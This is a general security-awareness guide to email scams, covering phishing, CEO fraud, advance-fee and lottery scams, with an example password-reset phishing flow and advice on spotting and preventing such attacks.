Email Scams

A guide to popular scams and how to stay protected

Email Scams

Emails are one of the most popular means of communication but they are also becoming the most exploited tool in the hands of cybercriminals. Lately, email scams have emerged as one of the most popular ways to con individuals or organizations through carefully targeted email messages.

The goal of email scams is to trick the recipient into providing personal or financial information, such as bank account or credit card details. The cybercriminals then use this information to empty the bank accounts, and in extreme cases, destroy reputations.

Email scams can be categorized into various forms.

Types of Email Scams

Phishing: Such scams have become commonplace. They involve sending an email that appears to be from a legitimate source, such as a bank or a government agency but is actually fraudulent. The email typically contains a link to a fake website that resembles the legitimate one with only minor changes, unnoticeable to the human eye, such as one letter flipped or interchanged. The recipient is asked to enter their personal or financial information. Once the attackers get hold of this information, they will then use it for fraudulent purposes.

Business email compromise (BEC)/CEO fraud: This type of scam continues to evolve and has cost businesses millions of dollars in damages. It is when someone pretends to be the CEO or senior leadership of your company and requests your finance or account teams for a money transfer. Scammers set up a lookalike email domain using information easily harvested from social networks. They then address specific individuals in your accounts or finance teams (employee information is again easily available on social networks) using an account with your CEO’s real name and real picture. The emails, invoking a sense of urgency, are sent at a time when your CEO or the senior leadership is away for vacation or meetings. This information can be easily gleaned by stalking your CEO’s social accounts or an alternative route could be gaining access to your CEO’s email account via phishing or other means. The end goal is asking your team to send money to an account that isn’t really related to your business or any clients and is owned by the scammer.

Nigerian scam: Another type of email scam is the "419 scam," popularly known as the Nigerian scam. It involves an email that claims to be from a wealthy individual who needs help transferring a large sum of money out of their country. The scammer asks the recipient to provide their bank account details and promises a large reward in return. Once the recipient provides their bank account details, the scammer disappears with all the funds.

Lottery and Prize scams: Such scams are too-good-to-be-true but people still fall for them, making them one of the most common scams. In these, the scammers claim that the recipient has won a large prize or a lottery, and asks for their social security numbers, bank account or credit card details to transfer the amount. Once the recipient provides this information, the scammer uses it to empty their account.

Know More:

Email Encryption

Encrypted Email

Examples of Email Scams

Cybercriminals are using several strategies to scam people. Here is an example of a common phishing scam.

Step 1: A spoofed email from a reputed domain id is mass-distributed.

Step 2: The email invokes a sense of urgency, claiming that the user’s password is about to expire and details instructions to reset or renew the password within 24 hours.

Step 3: If a user falls for this scam, they will click on the instructions link. From here, generally, two things happen. Either the user is redirected to a bogus page appearing exactly like the real password reset page, where both new and existing passwords are requested. Once the user enters their information, the scammers will use the original password to gain access to the user’s email or bank accounts. If the email is sent from an enterprise account, the cybercriminal can gain access to secured areas on the enterprise network.

In another instance, when a user clicks on the fake link, they are redirected to the actual password reset page. In the background, cybercriminals activate a malicious script to hijack the user’s session cookie, resulting in a reflected XSS attack. This gives them privileged access to the user’s email/bank account or an enterprise network.

How to Spot Email Scams

Vigilance is key to spotting email scams. Here are some ways you can identify a scam:

  • Check the sender's email address, and don’t click on any links or respond to the message if the email address seems suspicious or unfamiliar
  • Look for spelling and grammatical errors in the email text message
  • Thoroughly scan the email address or the website domain name for any spoofing trickery
  • Be extra cautious before giving out your personal details on any web page or email message

Ways to Prevent and Avoid Email Scams

There are several ways to prevent and avoid email scams. Here are a few:

  • Deploy an email security system to detect malicious attachments, unsafe URLs, and social engineering techniques. Considering today’s sophisticated attacks, the system should be able to customize threat protection based on each user’s unique vulnerability, attack profile, and access privileges
  • Use email domain authentication technology such as DMARC to prevent cybercriminals from exploiting your trusted domain to lure users into fake email schemes
  • Prevent email account compromise scams with best practices like deploying scanning internal emails and multifactor authentication (MFA)
  • Train your employees on the latest phishing tactics. Send regular notifications asking them to be on alert and look out for return email addresses that don’t match the sender’s domain
  • Update security patches and fortify your network defenses with antivirus and antimalware software
  • Back up data frequently in case you accidentally fall victim to such scams and use the best data recovery tools
  • Update your employees’ devices with security patches